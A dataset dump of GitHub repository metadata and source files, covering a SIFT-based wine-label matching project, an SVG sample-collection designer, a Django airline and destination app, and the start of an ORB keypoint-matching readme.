repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
lucnakache/winelabelmatching
https://github.com/lucnakache/winelabelmatching
df81e2067bddc33e7904968205351dcffce3e93f
bd0b5b45b1a27070653e289f2ca163d9eac88e5c
8ce8d7d02950cdc4f60f72dc9b29c2152691da47
refs/heads/master
2020-03-30T07:43:37.675172
2018-09-30T22:30:20
2018-09-30T22:30:20
150,962,125
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6917159557342529, "alphanum_fraction": 0.7106508612632751, "avg_line_length": 28.15517234802246, "blob_id": "5638e8980685807496fe9c02be789b7ccd542a5f", "content_id": "5bdde46b43fa2ddeca3a8f708df9b431415d15c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1690, "license_type": "no_license", "max_line_length": 94, "num_lines": 58, "path": "/functions/computervision_functions.py", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\n\ndef detect_and_draw_sift_features(imagepath):\n\n\t# Import image and preprocessing\n\timage = cv2.imread(imagepath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t#Create SIFT Feature Detector object\n\tsift = cv2.SIFT()\n\n\t#Detect key points\n\tkeypoints = sift.detect(gray, None)\n\n\t# Draw rich key points on input image\n\timage = cv2.drawKeypoints(image, keypoints, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n\treturn keypoints,image\n\n\n\n\n\n\ndef compute_keypoints_matching(new_image_path, image_template_path):\n # Function that compares input image to template\n # It then returns the number of SIFT matches between them\n \n image2 = cv2.imread(image_template_path, 0)\n image1 = cv2.imread(new_image_path, 0)\n \n # Create SIFT detector object\n sift = cv2.SIFT()\n\n # Obtain the keypoints and descriptors using SIFT\n keypoints_1, descriptors_1 = sift.detectAndCompute(image1, None)\n keypoints_2, descriptors_2 = sift.detectAndCompute(image2, None)\n\n # Define parameters for our Flann Matcher\n FLANN_INDEX_KDTREE = 0\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 3)\n search_params = dict(checks = 100)\n\n # Create the Flann Matcher object\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n\n # Obtain matches using K-Nearest Neighbor Method\n # the result 'matchs' is the number of similar matches found in both images\n matches = flann.knnMatch(descriptors_1, descriptors_2, k=2)\n\n # Store good matches using Lowe's ratio test\n good_matches = []\n for m,n in matches:\n if m.distance < 0.7 * n.distance:\n good_matches.append(m) \n\n return len(good_matches)" }, { "alpha_fraction": 0.7663716673851013, "alphanum_fraction": 0.769911527633667, "avg_line_length": 61.77777862548828, "blob_id": "7353520abd0f2b074d97f29667310579f926a040", "content_id": "e5d735c79b37c1c09e18c2990b1d4822aa97aa50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 581, "license_type": "no_license", "max_line_length": 397, "num_lines": 9, "path": "/resume/readme.md", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "Keypoints matching and image definition\n================\n\nScatter plot\n------------\n\n![](scatter_plot_rmarkdown_files/figure-markdown_github/unnamed-chunk-1-1.png) .\n\nComme on peut le voir, les étiquettes représentant les mêmes vins ont généralement un grand nombre de keypoints en commun. Cependant, les étiquettes représentant des vins différents provenant d'un même producteur ont elles aussi beaucoup de keypoints en commun. Plus la qualité des étiquettes est élevée plus de keypoints sont détectés. Et de ce fait, il y a éventuellement plus de match possible.\n" }, { "alpha_fraction": 0.7881694436073303, "alphanum_fraction": 0.7897681593894958, "avg_line_length": 82.46666717529297, "blob_id": "3efbb5a2a4aef8a82e16a18db7a7ad7115a1a922", "content_id": "b49f2bc79b291f0c4b34ffc0feaf860d13690088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1291, "license_type": "no_license", "max_line_length": 209, "num_lines": 15, "path": "/readme.md", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "# Objectif\nL'objectif de ce projet est de mesurer la performance d'un alogorithme de matching simple basée sur SIFT.\n\n### La méthode utilisée et l'étude de cas en bref\n * On reçoit un couple d'images représenant deux étiquettes de vins.\n * On veut savoir s'il s'agit du même vin ou pas.\n * Pour chacune des images, on extrait les keypoints discriminants.\n * Via un KNN, on match les keypoints les plus proches\n * Si les deux images représentent l'étiquette d'un même vin alors leur nombre de keypoints matched doit être élevée.\n * Au contraire, si les deux images représentent l'étiquette de vins différents, alors on s'attend à observer un nombre de keypoints matched faible.\n\n### Résumé des Résultats\n* Si deux images représentent un même vin, alors le nombre de keypoints matched est relativement élevée. Ce nombre est d'autant plus grand que la qualité d'image est élevée.\n* Si deux images représentent deux vins différents (différents producteurs), alors le nombre de keypoints est faible (<20) et ce quelque soit la qualité des images.\n* Si deux images représentent des vins différents mais appartenant à un même producteur, alors le nombre de keypoints matched est relativement élevée. Cela est probablement dû à une charte graphique identique." }, { "alpha_fraction": 0.6936363577842712, "alphanum_fraction": 0.6972727179527283, "avg_line_length": 35.66666793823242, "blob_id": "368d63082728cc5cfb7c8bd9349317abc32ece51", "content_id": "6cbac4eb3db7b0311c0727b6cd2e79d83e2df75c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 397, "num_lines": 30, "path": "/resume/scatter_plot_rmarkdown.Rmd", "repo_name": "lucnakache/winelabelmatching", "src_encoding": "UTF-8", "text": "---\ntitle: \"Keypoints matching and image definition\"\noutput: github_document\n---\n\n```{r setup, include=FALSE}\nlibrary(ggplot2)\nlibrary(plotly)\nlibrary(rmarkdown)\nlibrary(knitr)\nfolderdata=\"C:/Users/Bar Yokhai/Desktop/projets/Blog/winelabelmatching/data/\"\nfilename = \"scatter.txt\"\npathfile = paste0(folderdata,filename)\nstats_cv_df = read.table(file = pathfile,\n header = TRUE ,\n sep = \"\\t\",\n stringsAsFactors = FALSE)\np <- ggplot(stats_cv_df, aes(keypoints,pixel_total, couple = couple ))\np = p + geom_point(aes(colour = factor(type)))\n```\n\n\n## Scatter plot\n\n```{r fig.width=7, fig.height=4, echo = FALSE, message = FALSE}\np\n```\n. \n\nComme on peut le voir, les étiquettes représentant les mêmes vins ont généralement un grand nombre de keypoints en commun. Cependant, les étiquettes représentant des vins différents provenant d'un même producteur ont elles aussi beaucoup de keypoints en commun. Plus la qualité des étiquettes est élevée plus de keypoints sont détectés. Et de ce fait, il y a éventuellement plus de match possible.\n" } ]
4
fossabot/pysvgsamplescollection
https://github.com/fossabot/pysvgsamplescollection
6b3b0ebd74ac87b40e92167b06048abe588715f9
35c3b99a776d9f11c8363980722a0f0792a38978
aab0cd2ed745ffc7fd49aac5edb5f74d2482c1ec
refs/heads/master
2020-08-06T06:05:59.463528
2019-10-04T17:03:19
2019-10-04T17:03:19
212,864,427
0
0
null
2019-10-04T17:03:13
2019-10-01T22:01:34
2019-10-01T22:01:32
null
[ { "alpha_fraction": 0.7672316431999207, "alphanum_fraction": 0.7853107452392578, "avg_line_length": 37.4782600402832, "blob_id": "d30a7f6a7bcd5b335a6eebf0c4d57e0f9d41ca77", "content_id": "64539497f3e606e48cd96dd5e47ccd9d47cd845f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/examples/Silver_dastaset.py", "repo_name": "fossabot/pysvgsamplescollection", "src_encoding": "UTF-8", "text": "from svgsamplescollection import Samplescollection\nmySampCol = Samplescollection()\nmySampCol.name = 'Test silver'\nmySampCol.set_dataset_dimension.A4()\nmySampCol.set_sample_dimension.Microscope_slide()\nmySampCol.set_number_of_samples(15)\nmySampCol.margin_top_mm = 5\nmySampCol.margin_bottom_mm = 5\nmySampCol.minh_spacing_mm = 10\nmySampCol.minv_spacing_mm = 5\nmySampCol.create_sample_holder()\nmySampCol.populate_with_samples(material='silver')\nfor sample in mySampCol.samples[1:8]:\n sample.add_treatment(\"cheased\", \"graver\")\nfor sample in mySampCol.samples[1:5]:\n sample.add_layer(\"varnish\", \"nitorcellulose lacquer\", width_percent=0.7)\nfor sample in mySampCol.samples:\n sample.add_treatment(\"cleaning\", \"acetone\",width_percent=0.5)\nmySampCol.insert_alignment_MTF_standard()\nmySampCol.insert_scalebar()\nmySampCol.insert_standard()\nmySampCol.save_svg()\nmySampCol.save_masks_svg()\n" }, { "alpha_fraction": 0.7766934633255005, "alphanum_fraction": 0.7835820913314819, "avg_line_length": 57.099998474121094, "blob_id": "35f51ecc3c1e33c6cc7d8bde7ff469e0f33e4b7a", "content_id": "40b90e9fafd7ebc614b51e3fdd85f3805e7ecb7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1742, "license_type": "no_license", "max_line_length": 321, "num_lines": 30, "path": "/README.md", "repo_name": "fossabot/pysvgsamplescollection", "src_encoding": "UTF-8", "text": "# Python svg samples collection designer (IN DEVELOPMENT)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection?ref=badge_shield)\n\n\nThis Python script allows you to create a modified `.svg` rappresenting a flat samples collection. A flat samples collection is a group of flat samples (e.g. some pieces of metals with different varnishes, a series of coloured tile ...). The samples are contained in a samples holder that can be used as reference system.\n\n### Create, automate measurments and visualize\nThe `.svg`use the standard color coding of laser cutters so you can cut the samples and the samples holder with your laser cutter. If you don't have one you can find a [FabLab next to you](https://www.google.com/maps/search/fablab/) or use an [online service](https://www.google.com/search?q=online+laser+cutting).\n\nOnce you have your physical samples collection,if you have a positioning system (microscope stages, linear stages etc. etc) you can use the coordinates inside the `.svg` file for positioning your instrument on the sample (or the part of the sample) you are interested in.\n\nThe `.svg`can be read with any browser. The mouse over tooltip can show to anybody what's the last layer of your sample.\n\n\n### Create an .svg samples collection\n\n### Read and query the .svg file\n\n### Installation\n\n### Requirments\n\n\n\n\n\n\n\n## License\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection.svg?type=large)](https://app.fossa.io/projects/git%2Bgithub.com%2Fgiacomomarchioro%2Fpysvgsamplescollection?ref=badge_large)" } ]
2
icaboalo/backend
https://github.com/icaboalo/backend
268843932c099ac1da33ec79ade99e99a87dc044
40e0a55d2d822c2fac65d49bd86ef3459187bdb8
8b3180db762ba4294ead57f4630dc8ed25fe3d2b
refs/heads/master
2021-01-10T10:15:42.997002
2016-02-24T01:21:17
2016-02-24T01:21:17
52,134,147
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7310584187507629, "alphanum_fraction": 0.733371913433075, "avg_line_length": 23.714284896850586, "blob_id": "9f68a9ee4755db0b31270992a1741c4988a6d34b", "content_id": "d5a8dffe5b5333d9bf877403b3d90163b8fc6f37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1729, "license_type": "no_license", "max_line_length": 82, "num_lines": 70, "path": "/project/aerolinea/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom destino.models import *\nfrom usuario.models import Usuario\nfrom utils.countryinfo import COUNTRY_CHOICES\n\n#ModelManager\nclass AerolinaManager(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(is_active = True)\n\nclass MexicoCountryManager(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(pais = 'MX')\n\nclass VuelosManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super(VuelosManager, self).get_queryset().all()\n\n# Create your models here.\nclass Aerolinea(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Aerolinea\"\n\t\tverbose_name_plural = \"Aerolineas\"\n\n\t#Attributes\n\tnombre = models.CharField(max_length = 100, blank = False)\n\tpais = models.CharField(max_length = 2, choices = COUNTRY_CHOICES)\n\tis_active = models.BooleanField(default = True)\n\n\t#Manager\n\tobject = AerolinaManager()\n\t#active = AerolinaManager()\n\t#mexico = MexicoCountryManager()\n\n\tdef __str__(self):\n\t\treturn self.nombre\n\nclass Vuelo(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Vuelo\"\n\t\tverbose_name_plural = \"Vuelos\"\n\n\t#Relations\n\taerolinea = models.ForeignKey(Aerolinea)\n\tdestino = models.ForeignKey(Destino)\n\n\t#Attributes\n\tfecha = models.DateField(auto_now_add = True, blank = False)\n\thora = models.TimeField(auto_now_add = True, blank = False)\n\n\tdef __str__(self):\n\t\treturn (self.aerolinea.nombre + \" \" + self.destino.nombre)\n\n\t#Manager\n\tobject = VuelosManager()\n\nclass Bitacora(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Bitacora\"\n\t\tverbose_name_plural = \"Bitacoras\"\n\n\t#Relations\n\tusuario = models.ForeignKey(Usuario)\n\tvuelo = models.ForeignKey(Vuelo)\n\n\tdef __str__(self):\n\t\treturn self.usuario.usuario.first_name + \" viajo a \" + self.vuelo.destino.nombre" }, { "alpha_fraction": 0.5240793228149414, "alphanum_fraction": 0.5694050788879395, "avg_line_length": 24.214284896850586, "blob_id": "20b035a7ceda6ad4ba6595c5007fd610a7d1279e", "content_id": "a9591bd49b8a0f9dc43aba02004a7ee5edbe2aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 63, "num_lines": 28, "path": "/project/destino/migrations/0004_auto_20160220_0215.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 02:15\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.manager\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0003_auto_20160220_0143'),\n ]\n\n operations = [\n migrations.AlterModelManagers(\n name='destino',\n managers=[\n ('object', django.db.models.manager.Manager()),\n ],\n ),\n migrations.AddField(\n model_name='destino',\n name='rating',\n field=models.IntegerField(blank=True, default=5),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5527328848838806, "alphanum_fraction": 0.570438802242279, "avg_line_length": 34.10810852050781, "blob_id": "e5360288cc37eb83940dd5e80eac3165e19231d5", "content_id": "e2a52628b8740b82fea7339b77a524c1b0717755", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 120, "num_lines": 37, "path": "/project/aerolinea/migrations/0001_initial.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-19 22:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('destino', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aerolinea',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=100)),\n ('pais', models.CharField(max_length=2)),\n ('is_active', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Vuelo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('fecha', models.DateField()),\n ('hora', models.TimeField()),\n ('aerolinea', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aerolinea.Aerolinea')),\n ('destino', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='destino.Destino')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5583524107933044, "alphanum_fraction": 0.6018306612968445, "avg_line_length": 22, "blob_id": "9a05d01c08e8d3f43f70c806db347608f75acd22", "content_id": "a3900bd46b0c72d9085b0af748a18b1c82130725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 83, "num_lines": 19, "path": "/project/destino/migrations/0002_auto_20160220_0125.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:25\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='destino',\n options={'verbose_name': 'Destino', 'verbose_name_plural': 'Destinos'},\n ),\n ]\n" }, { "alpha_fraction": 0.5580558180809021, "alphanum_fraction": 0.5796579718589783, "avg_line_length": 36.03333282470703, "blob_id": "1085145831ac1c69463afdcc27a8de9e802ab0a8", "content_id": "d1b6a32687b30740ae688743e091a2d5c1926a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1112, "license_type": "no_license", "max_line_length": 200, "num_lines": 30, "path": "/project/aerolinea/migrations/0002_auto_20160220_0116.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:16\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuario', '0001_initial'),\n ('aerolinea', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bitacora',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('usuario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='usuario.Usuario')),\n ('vuelo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aerolinea.Vuelo')),\n ],\n ),\n migrations.AlterField(\n model_name='aerolinea',\n name='pais',\n field=models.CharField(choices=[('EU', 'ESTADOS UNIDOS'), ('MX', 'MEXICO'), ('AU', 'AUSTRALIA'), ('FR', 'FRANCIA'), ('BR', 'BRASIL'), ('SA', 'SUDAFRICA'), ('SP', 'ESPAÑA')], max_length=2),\n ),\n ]\n" }, { "alpha_fraction": 0.7395833134651184, "alphanum_fraction": 0.7395833134651184, "avg_line_length": 23.049999237060547, "blob_id": "902b49dfbe5ff57a202f4d0e001fe1c846d190c8", "content_id": "e1731c41f9f29e141ba980a947c8f3ae9ee7725c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 480, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/project/usuario/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom categoria.models import *\n\n# Create your models here.\nclass Usuario(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Usuario\"\n\t\tverbose_name_plural = \"Usuarios\"\n\n\t#Relations\n\tusuario = models.ForeignKey(User)\n\tperfil = models.ForeignKey(Categoria)\n\n\t#Attributes\n\tdate_added = models.DateTimeField(auto_now_add = True)\n\n\tdef __str__(self):\n\t\treturn (self.usuario.first_name + \" \" + self.usuario.last_name)" }, { "alpha_fraction": 0.5445161461830139, "alphanum_fraction": 0.5845161080360413, "avg_line_length": 27.703702926635742, "blob_id": "cb92fdb09dc27a66e62339b76c5e5328fc2c7ce1", "content_id": "de1a42c0e1b8772cf694508a3e18072957a122d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 775, "license_type": "no_license", "max_line_length": 87, "num_lines": 27, "path": "/project/aerolinea/migrations/0003_auto_20160220_0125.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 01:25\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('aerolinea', '0002_auto_20160220_0116'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='aerolinea',\n options={'verbose_name': 'Aerolinea', 'verbose_name_plural': 'Aerolineas'},\n ),\n migrations.AlterModelOptions(\n name='bitacora',\n options={'verbose_name': 'Bitacora', 'verbose_name_plural': 'Bitacoras'},\n ),\n migrations.AlterModelOptions(\n name='vuelo',\n options={'verbose_name': 'Vuelo', 'verbose_name_plural': 'Vuelos'},\n ),\n ]\n" }, { "alpha_fraction": 0.7305246591567993, "alphanum_fraction": 0.7408584952354431, "avg_line_length": 30.450000762939453, "blob_id": "bd78d592926f92d14bf53e18639b03e088d7272d", "content_id": "2d26f5b6d5c1a62b61ef9c5fc4c9a6cbb3548a9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 82, "num_lines": 40, "path": "/project/destino/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom categoria.models import *\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom utils.countryinfo import COUNTRY_CHOICES\n\n#ModelManager\nclass RatingManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super().get_queryset().filter(rating_gt = 2)\n\nclass MexicoCountryManager(models.Manager):\n\tdef get_queryset(self):\n\t\treturn super(MexicoCountryManager, self).get_queryset().filter(pais = 'MX')\n\n# Create your models here.\nclass Destino(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Destino\"\n\t\tverbose_name_plural = \"Destinos\"\n\n\t#Relations\n\tcategoria = models.ForeignKey(Categoria)\n\n\t#Attributes\n\tnombre = models.CharField(max_length = 100, blank = False)\n\tpais = models.CharField(choices = COUNTRY_CHOICES, max_length = 2, blank = False)\n\tContinente = models.CharField(max_length = 100, blank = False)\n\timagen = models.ImageField(upload_to = 'media/pais/', blank = True)\n\tis_active = models.BooleanField(default = True)\n\trating = models.IntegerField(blank = True, validators = [MaxValueValidator(10),\n MinValueValidator(1)])\n\n\t#Manager\n\tobject = models.Manager()\n\ttop10 = RatingManager()\n\tmexico = MexicoCountryManager()\n\n\tdef __str__(self):\n\t\treturn (self.pais + \" \" + self.nombre)\n" }, { "alpha_fraction": 0.5609195232391357, "alphanum_fraction": 0.5931034684181213, "avg_line_length": 30.071428298950195, "blob_id": "b5084fa2e4f5b9319df5404ff697259594604960", "content_id": "6c2506adb05893446bebf46b6b7c017a7405ffcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 120, "num_lines": 28, "path": "/project/destino/migrations/0001_initial.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-19 22:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('categoria', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Destino',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=100)),\n ('pais', models.CharField(max_length=100)),\n ('Continente', models.CharField(max_length=100)),\n ('categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='categoria.Categoria')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5615819096565247, "alphanum_fraction": 0.601129949092865, "avg_line_length": 33.03845977783203, "blob_id": "92cf96561052aa166ea9555c19220cf653daa34e", "content_id": "c88e085d59749c8f31cbefcca701cf8a405d6f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 886, "license_type": "no_license", "max_line_length": 200, "num_lines": 26, "path": "/project/destino/migrations/0005_auto_20160220_0236.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2016-02-20 02:36\nfrom __future__ import unicode_literals\n\nimport django.core.validators\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('destino', '0004_auto_20160220_0215'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='destino',\n name='pais',\n field=models.CharField(choices=[('EU', 'ESTADOS UNIDOS'), ('MX', 'MEXICO'), ('AU', 'AUSTRALIA'), ('FR', 'FRANCIA'), ('BR', 'BRASIL'), ('SA', 'SUDAFRICA'), ('SP', 'ESPAÑA')], max_length=2),\n ),\n migrations.AlterField(\n model_name='destino',\n name='rating',\n field=models.IntegerField(blank=True, validators=[django.core.validators.MaxValueValidator(10), django.core.validators.MinValueValidator(1)]),\n ),\n ]\n" }, { "alpha_fraction": 0.8177083134651184, "alphanum_fraction": 0.8177083134651184, "avg_line_length": 26.571428298950195, "blob_id": "541135711407f68b44fdd65fe809064a99625bd7", "content_id": "1150b8519013b5e644ac6abf4544fa9755701131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/project/aerolinea/admin.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom . import models\n\n# Register your models here.\nadmin.site.register(models.Aerolinea)\nadmin.site.register(models.Vuelo)\nadmin.site.register(models.Bitacora)" }, { "alpha_fraction": 0.7322275042533875, "alphanum_fraction": 0.7393364906311035, "avg_line_length": 21.263158798217773, "blob_id": "fcd7502feaa17f81cb1ac662160a558ffef51cff", "content_id": "9e816fdbf4126a3c094dd1064dfaaaf43d99b74f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/project/categoria/models.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.db import models\n\n#ModelManager\nclass Aventurero(models.Manager):\n\tdef queryset(self):\n\t\treturn super().get_queryset().filter(categoria = Aventurero)\n\n# Create your models here.\nclass Categoria(models.Model):\n\n\tclass Meta:\n\t\tverbose_name = \"Categoria\"\n\t\tverbose_name_plural = \"Categorias\"\n\n\t#Attributes\n\tcategoria = models.CharField(max_length = 100, blank = False)\n\n\tdef __str__(self):\n\t\treturn self.categoria" }, { "alpha_fraction": 0.7084547877311707, "alphanum_fraction": 0.7084547877311707, "avg_line_length": 21.733333587646484, "blob_id": "1a37ec8bbb0ef04726320c8e0ca06cc61867dd5d", "content_id": "6e5702f85f9cecbc5128a3686be431b61a3a427b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/project/aerolinea/views.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import *\n\n# Create your views here.\ndef vuelos(request):\n\n\tvuelo = Vuelo.object.all()\n\tvuelos = {}\n\t\n\tfor x in vuelo:\n\t\taerolinea = x.aerolinea.nombre\n\t\tdestino = x.destino.nombre\n\t\tvuelos.setdefault(aerolinea, []).append(destino)\n\n\treturn render(request, 'vuelos.html', {'vuelos' : vuelos})\n\n\t" }, { "alpha_fraction": 0.7243243455886841, "alphanum_fraction": 0.7243243455886841, "avg_line_length": 25.571428298950195, "blob_id": "425029f6fb3e247cc9922565d671033201bb1e10", "content_id": "ce90bb7a78fe532ae818f9786d2728cf1459055c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": "/project/destino/views.py", "repo_name": "icaboalo/backend", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import *\n\n# Create your views here.\ndef index(request):\n\td = Destino.mexico.all()\n\treturn render(request, 'index.html', {'destino' : d})" } ]
14
RahulDevadiga/Key-point-matching-Image-Processing
https://github.com/RahulDevadiga/Key-point-matching-Image-Processing
149e4449278fd830b323c0796ad06ad67ce3042a
4a1c633231503f7532dea7840fe8752430b57e27
b6ea99aa7276e8ae6f2d1675045f964306ffcaf3
refs/heads/master
2021-05-21T00:48:28.059144
2020-04-02T14:48:59
2020-04-02T14:48:59
252,474,623
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8009389638900757, "alphanum_fraction": 0.8009389638900757, "avg_line_length": 80.92308044433594, "blob_id": "f08ca2e1417677bd37c944d7f3cb5e06983e94d0", "content_id": "35e95681f93727b9d6ef48fc8a3e637f2c0db7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 283, "num_lines": 13, "path": "/README.md", "repo_name": "RahulDevadiga/Key-point-matching-Image-Processing", "src_encoding": "UTF-8", "text": "# Key-point-matching-Image-Processing\nGiven two images, it matches key points in the image and finds the average distance between those images.\n\n## ORB \nORB is basically a fusion of FAST keypoint detector and BRIEF descriptor with many modifications to enhance the performance. First it use FAST to find keypoints, then apply Harris corner measure to find top N points among them. It also uses a pyramid to produce multiscale-features. \nIt can be extended to detect an object in the image and can also be used to find the image which is closest to the given set of images\n\n\n# Following is the output of some of the 